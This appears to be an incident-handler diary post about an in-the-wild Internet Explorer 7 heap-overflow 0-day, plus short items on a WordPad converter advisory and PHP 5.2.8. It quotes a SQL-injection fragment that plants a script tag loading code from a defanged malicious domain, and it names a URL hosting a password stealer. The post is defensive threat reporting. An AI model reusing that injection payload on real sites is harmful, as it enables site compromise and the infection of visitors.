0-day exploit for Internet Explorer in the wild
UPDATE 2:
Here are couple of updates regarding the latest 0-day.
As noted in Microsoft's advisory, Windows Server 2008 and Vista (both SP0 and SP1) are affected as well. The exploit for Windows Vista is publicly available now as well, but most malicious web sites still use the exploit I analyzed yesterday, so they are attacking only Windows XP and Windows 2003 machines.
It also appears that more attackers are now using this – we received log files showing that attackers using SQL injection are now. The SQL Injection attacks are similar to those we've described multiple times before (see http://isc.sans.org/diary.html?storyid=4565, for example). The important part includes the target URL that is injected:
…
rtrim(convert(varchar(4000),['+@C+']))+''<script src=http://17gamo [dot] com/1.js></script>''')FETCH NEXT FROM
…
This domain is not listed by Shadowserver yet. The 1.js script on the domain links to multiple other HTML documents of which one is called ie7.htm. You guessed it, it contains the latest 0-day exploit for Internet Explorer.
If executed successfully, the script will download the binary from http://www [dot] steoo [dot] com/admin/win.exe. This is a game password stealer which has sporadic detection (http://www.virustotal.com/analisis/244ae03fed5b32d999c50b614fddde6a) – there are some big names still missing it.
In any case, the attackers are picking this quickly so make sure that you are following recommendations from Microsoft's advisory which will help reduce exposure or, if you can, use an alternative browser until this has been fixed.
--
Bojan
Update: Microsoft published a bulletin regarding this issue. See www.microsoft.com/technet/security/advisory/961051.mspx . In addition, shadowserver.org published a list of infected sites. Note that this list may not be complete. The best mitigating action from the bulletin is probably to enable DEP for Internet Explorer 7.[JBU]
As reported by some other researchers, there is a 0-day exploit for Internet Explorer circulating in the wild. At this point in time it does not appear to be wildly used, but as the code is publicly available we can expect that this will happen very soon.
This is a brand new exploit that is *not* patched with MS08-073 that was released yesterday. I can confirm that the exploit works in a fully patched Windows XP machine.
The exploit is a typical heap overflow that appears to be exploiting something in the XML parser. After setting up the heap (spraying it – allocating 159 arrays containing the shell code) the exploit checks if couple of things are satisfied before continuing:
- The user has to be running Internet Explorer
- The version of Internet Explorer has to be 7
- The operating system has to be Windows XP or Windows 2003
If these things are satisfied, the exploit creates an XML tag as shown above. What is also interesting, and can be seen in the code above is that it waits 6 seconds before executing the code – this was probably added to thwart automatic crawlers by anti-virus vendors.
We have not confirmed yet if other versions are affected (Internet Explorer 6 or Internet Explorer 7 on Microsoft Windows Vista).
How to mitigate? This is a difficult question as we have not analyzed this completely yet. If you use an alternative browser you are not affected. When we get more information we will update the diary.
--
Bojan
Microsoft wordpad text converter issue
In addition to the IE issue reported, Juha-Matti (thanks) pointed us to the blog entry at the MSRC which points to the following issue. http://www.microsoft.com/technet/security/advisory/960906.mspx
This issue affects the wordpad text converter for word 97 on a number of operating systems. XP SP3, Vista and Server 2008 are not vulnerable.
Microsoft is investigating some targeted attacks. If you have captures of samples relating to this let us know.
This issue is NOT addressed by any of the December patches.
Mark H - Shearwater
PHP Group has released PHP version 5.2.8
Our reader Roseman, dropped us an e-mail (which eventually arrived):
From US-CERT:
"The PHP Group has released PHP version 5.2.8 to address a vulnerability in the magic_quotes functionality. This vulnerability was introduced in PHP version 5.2.7. In addition to correcting this regression, PHP version 5.2.8 addresses a number of vulnerabilities that were originally addressed by version 5.2.7.
US-CERT encourages users to upgrade to PHP 5.2.8 or implement the workaround as described in the PHP 5.2.8 Release Announcement."
From PHP:
"PHP 5.2.8 Release Announcement
The PHP development team would like to announce the immediate availability of PHP 5.2.8. This release addresses a regression introduced by 5.2.7 in regard to the magic_quotes functionality, that was broken by an incorrect fix to the filter extension. All users who have upgraded to 5.2.7 are encouraged to upgrade to this release, alternatively you can apply a work-around for the bug by changing "filter.default_flags=0" in php.ini
For users upgrading from PHP 5.0 and PHP 5.1, an upgrade guide is available here, detailing the changes between those releases and PHP 5.2.8.
For a full list of changes in PHP 5.2.8, see the ChangeLog."
More details here :
http://www.php.net/releases/5_2_8.php
http://www.php.net/ChangeLog-5.php#5.2.8
http://bugs.php.net/bug.php?id=42718
Comments